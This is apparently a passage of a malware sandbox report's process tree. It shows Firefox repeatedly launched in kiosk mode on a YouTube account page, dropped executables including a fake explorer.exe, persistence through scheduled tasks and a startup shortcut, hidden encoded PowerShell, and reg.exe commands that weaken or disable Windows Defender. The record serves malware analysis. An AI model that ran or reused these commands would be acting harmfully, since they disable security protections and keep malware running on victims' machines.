                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.3.1378805071\123371839" -childID 2 -isForBrowser -prefsHandle 2620 -prefMapHandle 2616 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c96951f5-33e5-4c41-9b1a-853b5dc9a8e5} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 2632 1c4c2c58 tab
                                                          7⤵
                                                            PID:684
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.4.490890019\848908150" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3768 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {15cf1027-f68a-476a-9902-3cbc4813b483} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 3756 1bb0e158 tab
                                                            7⤵
                                                              PID:3672
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.5.642660925\1596535087" -childID 4 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85a5a2e6-3902-4c49-99e6-33850bd7e475} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 3920 1fe09e58 tab
                                                              7⤵
                                                                PID:3680
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1568.6.747114273\270310716" -childID 5 -isForBrowser -prefsHandle 4100 -prefMapHandle 4104 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b77701-d37c-44e1-8f1a-82f9ef28bf7e} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" 4084 1fe0aa58 tab
                                                                7⤵
                                                                  PID:3688
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              5⤵
                                                                PID:2500
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                  6⤵
                                                                    PID:2912
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                  5⤵
                                                                    PID:1756
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                      6⤵
                                                                      • Checks processor information in registry
                                                                      • Modifies registry class
                                                                      PID:3104
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.0.1401228073\1040116728" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 21788 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c44242e-0913-47f4-b9fc-3c935d1889eb} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 1280 13df5158 gpu
                                                                        7⤵
                                                                          PID:2932
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.1.1276805368\1907573381" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 22649 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {87bafc02-51cb-4523-a047-e01709dc52bc} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 1496 f72b58 socket
                                                                          7⤵
                                                                            PID:1836
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.2.1962665148\1222291117" -childID 1 -isForBrowser -prefsHandle 1736 -prefMapHandle 880 -prefsLen 22752 -prefMapSize 233836 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a452becd-e5da-4075-af54-2e7986e127fe} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 1728 1a49eb58 tab
                                                                            7⤵
                                                                              PID:748
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.3.1467584203\1928316279" -childID 2 -isForBrowser -prefsHandle 2196 -prefMapHandle 2296 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e333c387-ec21-408e-8b43-72ba0bccdda0} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 1912 f61358 tab
                                                                              7⤵
                                                                                PID:1180
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.4.2110039538\974088173" -childID 3 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6bb0083-2947-4653-a9c7-dd724bef33da} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 3428 f6c158 tab
                                                                                7⤵
                                                                                  PID:1060
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.5.1685406999\2122214961" -childID 4 -isForBrowser -prefsHandle 3580 -prefMapHandle 3476 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ed002f9-8117-4613-9a32-d13b7666fc7b} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 3556 223bcd58 tab
                                                                                  7⤵
                                                                                    PID:1568
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3104.6.1164805996\2058927009" -childID 5 -isForBrowser -prefsHandle 3716 -prefMapHandle 3720 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc904bf0-6721-4321-aa8d-12732311f7a8} 3104 "\\.\pipe\gecko-crash-server-pipe.3104" 3704 22c95558 tab
                                                                                    7⤵
                                                                                      PID:3692
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                  5⤵
                                                                                    PID:3800
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                      6⤵
                                                                                      • Checks processor information in registry
                                                                                      • Modifies registry class
                                                                                      PID:3804
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.0.1872269310\604196329" -parentBuildID 20221007134813 -prefsHandle 1196 -prefMapHandle 1188 -prefsLen 21972 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a29b40b9-c269-4169-82e4-59f9df8fb09d} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 1272 13ef6b58 gpu
                                                                                        7⤵
                                                                                          PID:4072
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.1.1621652779\1905337011" -parentBuildID 20221007134813 -prefsHandle 1464 -prefMapHandle 1460 -prefsLen 22833 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4b12959-5921-4773-8c35-48c7e289f69f} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 1476 e72558 socket
                                                                                          7⤵
                                                                                            PID:2732
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.2.1283204371\571878400" -childID 1 -isForBrowser -prefsHandle 1960 -prefMapHandle 1956 -prefsLen 22936 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce655951-d7c9-4c8b-b299-6479b9271740} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 1972 1a90c558 tab
                                                                                            7⤵
                                                                                              PID:3884
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.3.1934650477\1456450441" -childID 2 -isForBrowser -prefsHandle 2624 -prefMapHandle 2620 -prefsLen 27285 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {649a427d-cb9c-478c-85de-6b188fe351ff} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 2628 e61c58 tab
                                                                                              7⤵
                                                                                                PID:3908
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.4.1118121241\1890046373" -childID 3 -isForBrowser -prefsHandle 3208 -prefMapHandle 3176 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4ee3072-a265-4e30-bd9a-b27b592185a0} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3184 1eb4b558 tab
                                                                                                7⤵
                                                                                                  PID:2404
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.5.589640849\938903219" -childID 4 -isForBrowser -prefsHandle 3584 -prefMapHandle 3580 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {864c8478-a1bd-4160-8469-3046c6b295c4} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3596 21f6c358 tab
                                                                                                  7⤵
                                                                                                    PID:4028
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.6.1802171467\77249340" -childID 5 -isForBrowser -prefsHandle 3688 -prefMapHandle 3692 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed26f8cd-bd51-4b0f-b974-b431e9da7cee} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3572 21f6d558 tab
                                                                                                    7⤵
                                                                                                      PID:3740
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.7.912514604\400152649" -childID 6 -isForBrowser -prefsHandle 3868 -prefMapHandle 3872 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {61f2f826-e831-4300-a458-5b8efa58733a} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3856 21f6cc58 tab
                                                                                                      7⤵
                                                                                                        PID:3824
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.8.9641773\1285287858" -childID 7 -isForBrowser -prefsHandle 3204 -prefMapHandle 1688 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e25f4efb-5a01-4f42-b5a7-7fb186aee2fb} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3344 1c68af58 tab
                                                                                                        7⤵
                                                                                                          PID:3716
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.9.556626357\287834817" -childID 8 -isForBrowser -prefsHandle 3620 -prefMapHandle 3676 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2ab3638-aecc-461d-afbf-c111f26bf845} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3604 1c64fb58 tab
                                                                                                          7⤵
                                                                                                            PID:2252
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3804.10.2104067553\1330339737" -childID 9 -isForBrowser -prefsHandle 4040 -prefMapHandle 4392 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {123511db-826f-45f3-a57b-e49327e45d03} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3308 21f6b758 tab
                                                                                                            7⤵
                                                                                                              PID:3844
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:3300
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                    2⤵
                                                                                                      PID:2076
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:752
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                                                      2⤵
                                                                                                      • Drops startup file
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1852
                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                    taskeng.exe {150977C9-B697-4F07-A68D-5C0BF3874082} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
                                                                                                    1⤵
                                                                                                      PID:2100
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:3636
                                                                                                      • C:\ProgramData\explorer.exe
                                                                                                        C:\ProgramData\explorer.exe
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:464
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3632
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:3028
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3544
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:1752
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2284
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              3⤵
                                                                                                                PID:3452
                                                                                                            • C:\ProgramData\explorer.exe
                                                                                                              C:\ProgramData\explorer.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3036
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:4020
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                              2⤵
                                                                                                                PID:3076
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                  3⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:3412
                                                                                                              • C:\ProgramData\explorer.exe
                                                                                                                C:\ProgramData\explorer.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:3328
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3692
                                                                                                              • C:\ProgramData\explorer.exe
                                                                                                                C:\ProgramData\explorer.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:1788
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1768
                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                              taskeng.exe {B4FAA0B2-ACFC-49DD-B360-6247272DFABF} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                              1⤵
                                                                                                                PID:3776
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\RgEfSZt.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\RgEfSZt.exe PV /kQAhdidzAxN 385121 /S
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:1200
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    3⤵
                                                                                                                      PID:3804
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                        4⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        PID:1496
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3780
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            6⤵
                                                                                                                              PID:4012
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                          4⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:3548
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                              PID:4016
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                6⤵
                                                                                                                                  PID:2272
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                              4⤵
                                                                                                                              • Indirect Command Execution
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2760
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                5⤵
                                                                                                                                  PID:376
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    6⤵
                                                                                                                                      PID:2448
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                  4⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  PID:296
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:1800
                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                      6⤵
                                                                                                                                        PID:2616
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                    4⤵
                                                                                                                                    • Indirect Command Execution
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:1328
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                      5⤵
                                                                                                                                        PID:1624
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                          6⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2568
                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                            7⤵
                                                                                                                                              PID:3240
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "gDxleqOhd" /SC once /ST 10:48:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                      3⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:3332
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "gDxleqOhd"
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:3324
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /DELETE /F /TN "gDxleqOhd"
                                                                                                                                      3⤵
                                                                                                                                        PID:2004
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                        3⤵
